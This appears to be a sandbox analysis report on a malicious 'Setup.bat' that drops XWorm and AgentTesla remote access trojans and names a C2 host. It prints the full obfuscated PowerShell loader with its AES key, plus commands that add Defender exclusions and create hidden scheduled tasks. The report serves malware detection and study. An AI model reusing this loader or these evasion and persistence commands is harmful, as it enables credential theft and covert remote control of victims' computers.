Overview

overview

10

Static

static

10

Setup.bat

windows7-x64

8

Setup.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-09-2024 19:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Setup.bat

  • Size

    18.2MB

  • MD5

    5250a07fd2f90b5cee4b78aee015305b

  • SHA1

    f6880b911ef1df3c709ca47b19bc197014c86959

  • SHA256

    2edb7d64cdcf9445468c24d159cb4ec2316e69b31b82795a0520431d4c395e53

  • SHA512

    7fba9040b48d4bd644fd6aebbf6992afae192c8042b3a50b0fc78f194307fb4318191b75878408aeea6b5e0f8f83141ee49cc410973110093d8188f7852bef48

  • SSDEEP

    49152:9ufwwApQLWci6sSzR8hDsjxNu7bUDi1HssPlKrIixn9C5oLnybx7uti5BjgCP/XS:O

Score
10/10
agentteslaxwormexecutionkeyloggerpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

uk1.localto.net:4159

Attributes
  • Install_directory

    %Temp%

  • install_file

    schtask.exe

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • AgentTesla payload 1 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Setup.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:64
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lK+YKJdCjAV1Z8ut1BpXtFSoU+E3lcmfwVZkd34l2C0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cHpPCH8AR6iid5PEMXSpyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zlKbh=New-Object System.IO.MemoryStream(,$param_var); $ACBsk=New-Object System.IO.MemoryStream; $qyZkU=New-Object System.IO.Compression.GZipStream($zlKbh, [IO.Compression.CompressionMode]::Decompress); $qyZkU.CopyTo($ACBsk); $qyZkU.Dispose(); $zlKbh.Dispose(); $ACBsk.Dispose(); $ACBsk.ToArray();}function execute_function($param_var,$param2_var){ $DBRQQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RAdFM=$DBRQQ.EntryPoint; $RAdFM.Invoke($null, $param2_var);}$AlOet = 'C:\Users\Admin\AppData\Local\Temp\Setup.bat';$host.UI.RawUI.WindowTitle = $AlOet;$TLEWd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($AlOet).Split([Environment]::NewLine);foreach ($fxgzj in $TLEWd) { if ($fxgzj.StartsWith(':: ')) { $SZFwm=$fxgzj.Substring(3); break; }}$payloads_var=[string[]]$SZFwm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4896
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_113_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_113.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2364
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_113.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2688
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_113.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4528
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lK+YKJdCjAV1Z8ut1BpXtFSoU+E3lcmfwVZkd34l2C0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cHpPCH8AR6iid5PEMXSpyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zlKbh=New-Object System.IO.MemoryStream(,$param_var); $ACBsk=New-Object System.IO.MemoryStream; $qyZkU=New-Object System.IO.Compression.GZipStream($zlKbh, [IO.Compression.CompressionMode]::Decompress); $qyZkU.CopyTo($ACBsk); $qyZkU.Dispose(); $zlKbh.Dispose(); $ACBsk.Dispose(); $ACBsk.ToArray();}function execute_function($param_var,$param2_var){ $DBRQQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RAdFM=$DBRQQ.EntryPoint; $RAdFM.Invoke($null, $param2_var);}$AlOet = 'C:\Users\Admin\AppData\Roaming\startup_str_113.bat';$host.UI.RawUI.WindowTitle = $AlOet;$TLEWd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($AlOet).Split([Environment]::NewLine);foreach ($fxgzj in $TLEWd) { if ($fxgzj.StartsWith(':: ')) { $SZFwm=$fxgzj.Substring(3); break; }}$payloads_var=[string[]]$SZFwm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1548
            • C:\Users\Admin\AppData\Local\Temp\WizWorm.exe
              "C:\Users\Admin\AppData\Local\Temp\WizWorm.exe"
              6⤵
              • Executes dropped EXE
              • Enumerates system info in registry
              • Suspicious use of FindShellTrayWindow
              PID:2868
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3136
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3824
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2492
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "powershell" /tr "C:\Users\Admin\AppData\Local\Temp\powershell.exe"
              6⤵
              • Scheduled Task/Job: Scheduled Task
              PID:4416
  • C:\Users\Admin\AppData\Local\Temp\powershell.exe
    C:\Users\Admin\AppData\Local\Temp\powershell.exe
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    PID:3076

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    22310ad6749d8cc38284aa616efcd100

    SHA1

    440ef4a0a53bfa7c83fe84326a1dff4326dcb515

    SHA256

    55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

    SHA512

    2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    1cc5e033811a5d520bb4a6904b5c433b

    SHA1

    c159a342ed372790600b3a6ac97e274638a0ce9a

    SHA256

    9e20052dd29dfcd8220dcf271acd3e27f9d6b785d72531043741ef349b48c7a8

    SHA512

    dd8b57e50382a7a84aea3986c3ae8a38ade0fb84a5c9696339487022321be12f08aff9d47455a28137e31a8632cda2490dcf0332c6b3c72e7cfdd10e63e4f429

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    6d3e9c29fe44e90aae6ed30ccf799ca8

    SHA1

    c7974ef72264bbdf13a2793ccf1aed11bc565dce

    SHA256

    2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

    SHA512

    60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\WizWorm.exe
    Filesize

    14.3MB

    MD5

    0d7b4b1882f63bdd50b95c566d71ae14

    SHA1

    fd44458018d9ba5beee8a67b7f22bb5c6e1f850d

    SHA256

    4a095cf379d66c7123416fec489a8ef6b767fec71959e13714127d6c3bb41c06

    SHA512

    97ad65c805be31d1d530077b4736ff4c844c51a2d4550e856933f08a328e4c74ecef7e22040a27e9a03509170c4bc780e26b0389cb57385d5217f56d68a7aeda

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0ofwxv0z.i35.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\powershell.exe
    Filesize

    442KB

    MD5

    04029e121a0cfa5991749937dd22a1d9

    SHA1

    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

    SHA256

    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

    SHA512

    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_113.bat
    Filesize

    18.2MB

    MD5

    5250a07fd2f90b5cee4b78aee015305b

    SHA1

    f6880b911ef1df3c709ca47b19bc197014c86959

    SHA256

    2edb7d64cdcf9445468c24d159cb4ec2316e69b31b82795a0520431d4c395e53

    SHA512

    7fba9040b48d4bd644fd6aebbf6992afae192c8042b3a50b0fc78f194307fb4318191b75878408aeea6b5e0f8f83141ee49cc410973110093d8188f7852bef48

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_113.vbs
    Filesize

    115B

    MD5

    3d75b7086224a617a465e166cbda4a58

    SHA1

    913690e1d3329f827ace4b820df89de053865c71

    SHA256

    3572ebc273a32432ff7f5e867957611bba22f4b71821cd2fb971a1979da029e5

    SHA512

    8575f44995e732e1b2690557910bfa3709d9b7169397c344bcec063dc66a37ae8854a05a1f114b32c8956691abf804aa4b01d20a7f23ccfba77345b665cbea31

    Download Submit

  • memory/1548-55-0x0000027300AB0000-0x0000027300ACA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/1548-127-0x0000027300AA0000-0x0000027300AAC000-memory.dmp

    Filesize

    48KB

    Download

  • memory/2364-19-0x00007FF9886B0000-0x00007FF989171000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2364-29-0x00007FF9886B0000-0x00007FF989171000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2364-30-0x00007FF9886B0000-0x00007FF989171000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2364-33-0x00007FF9886B0000-0x00007FF989171000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2868-78-0x0000011D84040000-0x0000011D84052000-memory.dmp

    Filesize

    72KB

    Download

  • memory/2868-77-0x0000011D9F330000-0x0000011D9F38C000-memory.dmp

    Filesize

    368KB

    Download

  • memory/2868-93-0x0000011DA1210000-0x0000011DA12BA000-memory.dmp

    Filesize

    680KB

    Download

  • memory/2868-79-0x0000011D9F5B0000-0x0000011D9F7A4000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/2868-66-0x0000011D82BB0000-0x0000011D83A0E000-memory.dmp

    Filesize

    14.4MB

    Download

  • memory/2868-67-0x0000011D9E040000-0x0000011D9F232000-memory.dmp

    Filesize

    17.9MB

    Download

  • memory/3076-124-0x00000235CD9A0000-0x00000235CDA16000-memory.dmp

    Filesize

    472KB

    Download

  • memory/3076-123-0x00000235CD520000-0x00000235CD564000-memory.dmp

    Filesize

    272KB

    Download

  • memory/4896-0-0x00007FF9886B3000-0x00007FF9886B5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4896-17-0x0000025645FD0000-0x0000025646E62000-memory.dmp

    Filesize

    14.6MB

    Download

  • memory/4896-14-0x0000025625760000-0x0000025625768000-memory.dmp

    Filesize

    32KB

    Download

  • memory/4896-13-0x00007FF9886B3000-0x00007FF9886B5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4896-15-0x00007FF9886B0000-0x00007FF989171000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4896-12-0x00007FF9886B0000-0x00007FF989171000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4896-11-0x00007FF9886B0000-0x00007FF989171000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4896-52-0x00007FF9886B0000-0x00007FF989171000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4896-16-0x00007FF9886B0000-0x00007FF989171000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4896-7-0x0000025625A00000-0x0000025625A22000-memory.dmp

    Filesize

    136KB

    Download